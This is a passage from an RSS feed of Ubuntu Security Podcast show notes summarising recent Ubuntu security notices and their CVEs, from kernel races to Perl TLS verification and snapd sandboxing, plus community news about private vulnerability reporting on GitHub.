<h3 id="usn-6122-1-linux-kernel--oem--vulnerabilities--04-49">[<a href="https://ubuntu.com/security/notices/USN-6122-1">USN-6122-1</a>] Linux kernel (OEM) vulnerabilities (04:49)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2612">CVE-2023-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.1 OEM 22.04 LTS</li>
<li>Race condition in netfilter able to be triggered by a local user -&gt; UAF
<ul>
<li>requires <code>CAP_NET_ADMIN</code> but can get this in an unprivileged user namespace ∴
can be triggered OOTB by an unpriv user on Ubuntu</li>
<li>PoC was published for this last week - caused a bunch of folks to get
anxious but since can be mitigated by disabling unprivileged user namespaces
perhaps it was not worth all the hype? Also kernel updates take a while to
prepare and test etc so it is not easy to just drop everything and crank a
new kernel - so in general this would only occur for remotely exploitable
issues</li>
</ul>
</li>
</ul>
<h3 id="usn-6123-1-linux-kernel--oem--vulnerabilities--06-48">[<a href="https://ubuntu.com/security/notices/USN-6123-1">USN-6123-1</a>] Linux kernel (OEM) vulnerabilities (06:48)</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-26606">CVE-2023-26606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2612">CVE-2023-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1670">CVE-2023-1670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.0 OEM</li>
<li>Netfilter issue above, plus mishandling of control registers in nested KVM
VMs - could allow an guest VM to crash the VM host</li>
</ul>
<h3 id="usn-6124-1-linux-kernel--oem--vulnerabilities--07-10">[<a href="https://ubuntu.com/security/notices/USN-6124-1">USN-6124-1</a>] Linux kernel (OEM) vulnerabilities (07:10)</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2612">CVE-2023-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1670">CVE-2023-1670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4139">CVE-2022-4139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3586">CVE-2022-3586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.17 OEM</li>
<li>Mostly same issues as above</li>
</ul>
<h3 id="usn-6097-1-linux-ptp-vulnerability--07-20">[<a href="https://ubuntu.com/security/notices/USN-6097-1">USN-6097-1</a>] Linux PTP vulnerability (07:20)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3570">CVE-2021-3570</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Precision time protocol implementation - allows to synchronise time between
servers to sub-microsecond accuracy - more accurate than NTP - uses a
leader/follower architecture - leader would be synchronised with high accuracy
via say a GPS then distributes this to other machines via PTP</li>
<li>Failed to check length of received packet properly (but only for forwarded
packets) - results in a OOB R/W - so could either be an info leak or possible
RCE</li>
</ul>
<h3 id="usn-6005-2-sudo-vulnerabilities--08-49">[<a href="https://ubuntu.com/security/notices/USN-6005-2">USN-6005-2</a>] Sudo vulnerabilities (08:49)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28487">CVE-2023-28487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28486">CVE-2023-28486</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-193/#usn-6005-1-sudo-vulnerabilities--07-25">[USN-6005-1] Sudo vulnerabilities in Episode 193</a></li>
</ul>
<h3 id="usn-6111-1-flask-vulnerability--09-02">[<a href="https://ubuntu.com/security/notices/USN-6111-1">USN-6111-1</a>] Flask vulnerability (09:02)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-30861">CVE-2023-30861</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possibly sends a response intended for one client to a different client due to
mishandling of the <code>Vary:Cookie</code> header - requires the use of a caching proxy
and other conditions though so may not be a widespread issue</li>
</ul>
<h3 id="usn-6112-1-perl-vulnerability--09-35">[<a href="https://ubuntu.com/security/notices/USN-6112-1">USN-6112-1</a>] Perl vulnerability (09:35)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-31484">CVE-2023-31484</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly validate TLS certs when using CPAN with &lt;:Tiny&gt; to
download modules over HTTPS - failed to set <code>ssl_Verify</code> - parameter to
&lt;:Tiny&gt;</li>
<li>Seems the <a href="https://metacpan.org/pod/HTTP::Tiny#SSL-SUPPORT">upstream HTTP::Tiny dev&rsquo;s thinks it would be discriminatory</a> to
enable SSL verification by default as that would make applications etc that
use self-signed certs or community-driven CAs like CAcert.org fail - but this
seems pretty outdated since with Let&rsquo;s Encrypt etc nowadays there is easy
access to trusted certs for anyone - and so this just does a disservice to all
applications that use &lt;:Tiny&gt; making them potentially insecure
out-of-the-box</li>
<li>Won&rsquo;t be surprised to see other similar vulns in the future as a result of
this foot-gun</li>
</ul>
<h3 id="usn-6114-1-nth-check-vulnerability--11-32">[<a href="https://ubuntu.com/security/notices/USN-6114-1">USN-6114-1</a>] nth-check vulnerability (11:32)</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3803">CVE-2021-3803</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Node.js module for parsing and compiling CSS nth-checks (used in CSS 3
<code>nth-child()</code> and <code>nth-last-of-type()</code> functions) - can pass it a string and it
will compile that to an optimised function for calling by other code</li>
<li>REDoS</li>
</ul>
<h3 id="usn-6116-1-hawk-vulnerability--12-11">[<a href="https://ubuntu.com/security/notices/USN-6116-1">USN-6116-1</a>] hawk vulnerability (12:11)</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29167">CVE-2022-29167</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Node.js HTTP Holder-of-key authentication scheme - a HTTP authentication
scheme that is similar to the regular HTTP Digest scheme - developed by Mozilla</li>
<li>REDoS</li>
</ul>
<h3 id="usn-6115-1-tex-live-vulnerability--12-47">[<a href="https://ubuntu.com/security/notices/USN-6115-1">USN-6115-1</a>] TeX Live vulnerability (12:47)</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32700">CVE-2023-32700</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Shell command execution in luatex if run against an untrusted document since
could access the io stream used by the underlying lua engine and inject
contents into it which would then be executed</li>
</ul>
<h3 id="usn-6119-1-openssl-vulnerabilities--13-20">[<a href="https://ubuntu.com/security/notices/USN-6119-1">USN-6119-1</a>] OpenSSL vulnerabilities (13:20)</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1255">CVE-2023-1255</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2650">CVE-2023-2650</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>CPU-based DoS when processing crafted ASN.1 object identifiers - requires to
have an object ID which itself is tens to hundreds of KBs - OpenSSL 3 has a
limit of 100KB on the peer cert chain which limits the ability to craft such
long IDs and have them be processed by OpenSSL</li>
<li>An aarch64 specific issue - AES-XTS decryption algorithm would possibly read
past the end of the input buffer -&gt; OOB read -&gt; possible DoS but only if the
ciphertext is a certain size relative to the block size</li>
</ul>
<h3 id="usn-6120-1-spidermonkey-vulnerabilities--14-25">[<a href="https://ubuntu.com/security/notices/USN-6120-1">USN-6120-1</a>] SpiderMonkey vulnerabilities (14:25)</h3>
<ul>
<li>9 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32215">CVE-2023-32215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32211">CVE-2023-32211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29550">CVE-2023-29550</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29548">CVE-2023-29548</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29536">CVE-2023-29536</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29535">CVE-2023-29535</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25751">CVE-2023-25751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25739">CVE-2023-25739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25735">CVE-2023-25735</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>mozjs 102.11 release - JS engine shipped in Firefox so has a lot of overlap
with CVEs in firefox etc.</li>
<li>thanks to the Jeremy Bicha on the Ubuntu Desktop team for preparing these
updates</li>
</ul>
<h3 id="usn-6121-1-nanopb-vulnerabilities--14-45">[<a href="https://ubuntu.com/security/notices/USN-6121-1">USN-6121-1</a>] Nanopb vulnerabilities (14:45)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21401">CVE-2021-21401</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26243">CVE-2020-26243</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Implementation of Protocol Buffers but with small code size - designed for embedded systems etc</li>
<li>Memory leak on parsing of crafted messages plus an invalid <code>free()</code> or <code>realloc()</code>
on crafted messages - both only really an issue if parsing untrusted content</li>
</ul>
<h3 id="usn-6117-1-apache-batik-vulnerabilities--15-16">[<a href="https://ubuntu.com/security/notices/USN-6117-1">USN-6117-1</a>] Apache Batik vulnerabilities (15:16)</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-42890">CVE-2022-42890</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41704">CVE-2022-41704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40146">CVE-2022-40146</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38648">CVE-2022-38648</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38398">CVE-2022-38398</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11987">CVE-2020-11987</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17566">CVE-2019-17566</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Java SVG library</li>
<li>4 different XSRF issues</li>
<li>1 SSRF issue on handling of URLs in Jar&rsquo;s - could allow to access local files
on the server</li>
<li>2 different issues that could allow untrusted Java code embedded in an SVG to
be executed</li>
</ul>
<h3 id="usn-6125-1-snapd-vulnerability--15-48">[<a href="https://ubuntu.com/security/notices/USN-6125-1">USN-6125-1</a>] snapd vulnerability (15:48)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1523">CVE-2023-1523</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Very similar to a recent issue (<a href="https://ubuntu.com/security/CVE-2023-28100">CVE-2023-28100</a>) in flatpak - seccomp sandbox failed to block
the <code>TIOCLINUX</code> <code>ioctl()</code> request - could allow a snap to inject contents into the
controlling terminal when run on a virtual console - this would then be
executed when the snap finished running -&gt; code exec outside the snap sandbox</li>
<li>Now simply blocks <code>TIOCLINUX</code> as it already did for <code>TIOCSTI</code> in the past</li>
<li>Very similar to historic <code>TIOCSTI</code> CVEs such as <a href="https://ubuntu.com/security/CVE-2016-9016">CVE-2016-9016</a> in firejail,
<a href="https://ubuntu.com/security/CVE-2016-10124">CVE-2016-10124</a> in lxc, <a href="https://ubuntu.com/security/CVE-2017-5226">CVE-2017-5226</a> in bubblewrap, <a href="https://ubuntu.com/security/CVE-2019-10063">CVE-2019-10063</a> in flatpak</li>
</ul>
<h3 id="usn-6126-1-libvirt-vulnerabilities--17-44">[<a href="https://ubuntu.com/security/notices/USN-6126-1">USN-6126-1</a>] libvirt vulnerabilities (17:44)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2700">CVE-2023-2700</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0897">CVE-2022-0897</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>race condition within the nwfilter driver - allows a local unprivileged user
to race against the driver and corrupt the list of network filters and trigger
a crash in the libvirt daemon</li>
<li>memory leak when reading SR-IOV PCI device capabilities</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-18-dot-04-has-now-entered-esm--18-21">Ubuntu 18.04 has now entered ESM (18:21)</h3>
<ul>
<li><a href="https://www.omgubuntu.co.uk/2023/05/ubuntu-18-04-general-support-ends-enable-esm-to-stay-protected">https://www.omgubuntu.co.uk/2023/05/ubuntu-18-04-general-support-ends-enable-esm-to-stay-protected</a></li>
</ul>
<h3 id="openprinting-tutorial-on-handling-security-bugs-via-github--19-40">OpenPrinting tutorial on handling security bugs via GitHub (19:40)</h3>
<ul>
<li><a href="https://openprinting.github.io/OpenPrinting-News-May-2023/#handling-reported-security-bugs-with-github">https://openprinting.github.io/OpenPrinting-News-May-2023/#handling-reported-security-bugs-with-github</a></li>
<li><a href="/episode-196/#usn-6083-1-cups-filters-vulnerability--01-03">Last week we talked about a vulnerability in the cups-filter package</a></li>
<li>Discusses the difficulty in handling security issues in open source projects,
where all the development is usually done in the open, how do you privately
report and collaborate on a security issue?</li>
<li>GitHub offers <a href="https://docs.github.com/en/code-security/security-advisories/guidance-on-reporting-and-writing/privately-reporting-a-security-vulnerability">the ability to report security vulnerabilities privately</a></li>
<li>Not enabled by default since it requires some configuration on the part of the
maintainer to configure the templates etc that get sent out - also needs the
organisation that owns the repo to enable this as well
<ul>
<li>GitHub offer some <a href="https://docs.github.com/en/code-security/security-advisories/repository-security-advisories/creating-a-repository-security-advisory">great guidance</a> on the <a href="https://docs.github.com/en/code-security/security-advisories/guidance-on-reporting-and-writing/best-practices-for-writing-repository-security-advisories">best ways to do this</a></li>
</ul>
</li>
<li>Usual workflow is to submit a report privately and then can create a temporary
private fork in which to develop the fix</li>
<li>Read Till&rsquo;s blog post as that contains a great walk-through on how to enable
this</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E197.mp3" length="23884994" type="audio/mpeg" /><itunes:duration>1410</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 196
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-196/</link>
          <pubDate>Fri, 26 May 2023 17:24:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>8ff9a5fb80e91904bc671e65141624f18d11bf3e46704d3f7c337d8bfb5d90d260419c2846a5f44756940f01c795067e8455f839b05964c4d4dcdb15bd06dcd0</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 196</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at some recent security developments from PyPI, the Linux
  Security Summit North America and the pending transition of Ubuntu 18.04 to ESM,
  plus we cover security updates for cups-filter, the Linux kernel, Git, runC,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at some recent security developments from PyPI, the Linux
  Security Summit North America and the pending transition of Ubuntu 18.04 to ESM,
  plus we cover security updates for cups-filter, the Linux kernel, Git, runC,
  ncurses, cloud-init and more.
  </itunes:summary>
        <description>  This week we look at some recent security developments from PyPI, the Linux
  Security Summit North America and the pending transition of Ubuntu 18.04 to ESM,
  plus we cover security updates for cups-filter, the Linux kernel, Git, runC,
  ncurses, cloud-init and more.
  </description>
        <googleplay:description>  This week we look at some recent security developments from PyPI, the Linux
  Security Summit North America and the pending transition of Ubuntu 18.04 to ESM,
  plus we cover security updates for cups-filter, the Linux kernel, Git, runC,
  ncurses, cloud-init and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some recent security developments from PyPI, the Linux
Security Summit North America and the pending transition of Ubuntu 18.04 to ESM,
plus we cover security updates for cups-filter, the Linux kernel, Git, runC,
ncurses, cloud-init and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>83 unique CVEs addressed</p>
<h3 id="usn-6083-1-cups-filters-vulnerability--01-03">[<a href="https://ubuntu.com/security/notices/USN-6083-1">USN-6083-1</a>] cups-filters vulnerability (01:03)</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-24805">CVE-2023-24805</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Legacy BEH (Backend Error Handler) allows to create a network accessible
printer - allowed to do pretty easy RCE since used <code>system()</code> to run a command
which contained various values that can be controlled by the attacker</li>
<li>Fixed by upstream to use <code>fork()</code> and <code>execve()</code> plus some other smaller changes
to perform sanitisation of the input</li>
</ul>
<h3 id="usn-6084-1-linux-kernel-vulnerabilities--01-45">[<a href="https://ubuntu.com/security/notices/USN-6084-1">USN-6084-1</a>] Linux kernel vulnerabilities (01:45)</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 18.04 GCP + Oracle, 16.04 Oracle</li>
</ul>
<h3 id="usn-6085-1-linux-kernel--raspberry-pi--vulnerabilities--02-00">[<a href="https://ubuntu.com/security/notices/USN-6085-1">USN-6085-1</a>] Linux kernel (Raspberry Pi) vulnerabilities (02:00)</h3>
<ul>
<li>10 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20938">CVE-2023-20938</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3707">CVE-2022-3707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 Raspi kernel</li>
<li>Various UAFs in different drivers and subsystems, possible speculative
execution attack against AMD x86-64 processors with SMT enabled, a few type
confusion bugs leading to OOB reads etc</li>
</ul>
<h3 id="usn-6090-1-linux-kernel-vulnerabilities--02-26">[<a href="https://ubuntu.com/security/notices/USN-6090-1">USN-6090-1</a>] Linux kernel vulnerabilities (02:26)</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20938">CVE-2023-20938</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3707">CVE-2022-3707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Same set of vulns as above</li>
<li>5.15 22.04 GKE, GCP; 20.04 GKE, GCP, Oracle</li>
</ul>
<h3 id="usn-6089-1-linux-kernel--oem--vulnerability--02-45">[<a href="https://ubuntu.com/security/notices/USN-6089-1">USN-6089-1</a>] Linux kernel (OEM) vulnerability (02:45)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-4139">CVE-2022-4139</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.0 OEM</li>
<li>i915 failed to flush GPU TLB in some cases -&gt; DoS / RCE</li>
</ul>
<h3 id="usn-6091-1-linux-kernel-vulnerabilities--03-09">[<a href="https://ubuntu.com/security/notices/USN-6091-1">USN-6091-1</a>] Linux kernel vulnerabilities (03:09)</h3>
<ul>
<li>25 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26544">CVE-2023-26544</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23455">CVE-2023-23455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23454">CVE-2023-23454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21106">CVE-2023-21106</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21102">CVE-2023-21102</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1652">CVE-2023-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1074">CVE-2023-1074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1073">CVE-2023-1073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0458">CVE-2023-0458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0394">CVE-2023-0394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0210">CVE-2023-0210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48424">CVE-2022-48424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48423">CVE-2022-48423</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4842">CVE-2022-4842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4129">CVE-2022-4129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3707">CVE-2022-3707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36280">CVE-2022-36280</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.19 IBM + Oracle</li>
<li>Lots of the previously mentioned issues and more - same kinds of issues though
(race conditions, UAFs, OOB writes etc in various drivers / subsystems)</li>
</ul>
<h3 id="usn-6096-1-linux-kernel-vulnerabilities--03-34">[<a href="https://ubuntu.com/security/notices/USN-6096-1">USN-6096-1</a>] Linux kernel vulnerabilities (03:34)</h3>
<ul>
<li>25 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26544">CVE-2023-26544</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23455">CVE-2023-23455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23454">CVE-2023-23454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21106">CVE-2023-21106</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21102">CVE-2023-21102</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1652">CVE-2023-1652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
